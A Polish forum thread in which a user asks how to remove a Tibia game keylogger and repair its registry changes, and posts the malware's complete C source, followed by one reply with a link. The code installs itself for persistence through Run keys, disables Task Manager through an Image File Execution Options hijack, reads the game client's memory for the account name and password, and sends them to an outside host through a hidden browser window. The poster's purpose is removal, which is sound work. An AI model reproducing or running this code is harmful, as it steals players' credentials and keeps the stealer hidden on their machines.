Problem z usunięciem keyloggera.

[zorlan]

Chodzi mi o usunięcie key loggera który był umieszczony tutaj na forum "tibia-logger". Chodzi mi o skuteczne usunięcie loggera oraz odwrócenie szkód jakie uczynił w rejestrze.Kkod zamieszczam poniżej:

Kod:

#include <windows.h>
main(short argc, char *argv[])
{
unsigned char acc[7],acc2[7],acc3[14],pwd[30],pwd2[30],pwd3[60],send[333],drive[3],userprofile[50],inst[50],inst2[100],ie[36];
wsprintf((char*)drive,"%s",getenv("homedrive"));
wsprintf((char*)inst,"%s\\Program Files\\xerox\\wdfmgr-xidxx.exe",drive);
wsprintf((char*)userprofile,"%s",getenv("userprofile"));
wsprintf((char*)inst2,"%s\\wdfmgr-xidxx.exe",userprofile);
if((strcmp(argv[0],(char*)inst)!=0)&&(strcmp(argv[0],(char*)inst2)!=0))
{
unsigned short chk=0;
HKEY klucz;
if((RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer\\Run",false,false,REG_OPTION_NON_VOLATILE,KEY_WRITE,false,&klucz,false)==false)&&(chk=1)&&(MoveFile(argv[0],(char*)inst)==true)&&(chk=2))
{
RegSetValueEx(klucz,"SysCore32-IDxidxx",false,REG_SZ,(BYTE*)inst,50);
HKEY klucz2;
RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe",false,false,REG_OPTION_NON_VOLATILE,KEY_WRITE,false,&klucz2,false);
RegSetValueEx(klucz2,"debugger",false,REG_SZ,(BYTE*)"calc",4);
RegCloseKey(klucz2);    
}
RegCloseKey(klucz);
if(chk==0)
{
if((MoveFile(argv[0],(char*)inst2)==false))
{
return false;                                       
}
else
{
HKEY klucz;
RegCreateKeyEx(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\run",false,false,REG_OPTION_NON_VOLATILE,KEY_WRITE,false,&klucz,false);
RegSetValueEx(klucz,"SysCore32-IDxidxx",false,REG_SZ,(BYTE*)inst2,70);
RegCloseKey(klucz);
chk=2;
}
}
if(chk==1)
{  
return false;
}

}                                  
HWND hWnd;
DWORD processId;
HANDLE hProcess;
wsprintf((char*)ie,"%s\\Program Files\\Internet Explorer\\",drive);
while(true)
{
Sleep(3000);
if(!(hWnd=FindWindow("TibiaClient",false)))continue;
GetWindowThreadProcessId(hWnd,&processId);
hProcess=OpenProcess(PROCESS_VM_READ,false,processId);
ReadProcessMemory(hProcess,(LPVOID)0x75D3CC,&acc,7,0);
if((strcmp((char*)acc,"0")==0)||(strcmp((char*)acc,"")==0))continue;
ReadProcessMemory(hProcess,(LPVOID)0x75D3AC,&pwd,30,0);
if((strcmp((char*)pwd,"")==0)||((strcmp((char*)acc,(char*)acc2)==0)&&(strcmp((char*)pwd,(char*)pwd2)==0)))continue;
for(short i=0;i<strlen((char*)acc);i++)
{
wsprintf((char*)&acc3[2*i],"%x",acc[i]);
}
for(short i=0;i<strlen((char*)pwd);i++)
{
wsprintf((char*)&pwd3[2*i],"%x",pwd[i]);
}
wsprintf((char*)acc2,"%s",acc);
wsprintf((char*)pwd2,"%s",pwd);
wsprintf((char*)send,"http://tibialogger.freevar.com/n.php?a=%s&b=%s77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777",acc3,pwd3);
//po kompilacji zamien hexem te siodemki na 0
ShellExecute(false,"open","iexplore.exe",(char*)send,(char*)ie,SW_HIDE);
}
}

Zorlan

[Micr0]

trochę na ten temat jest tutaj
http://hack.pl/forum/thread1473,ctrl__alt__del.html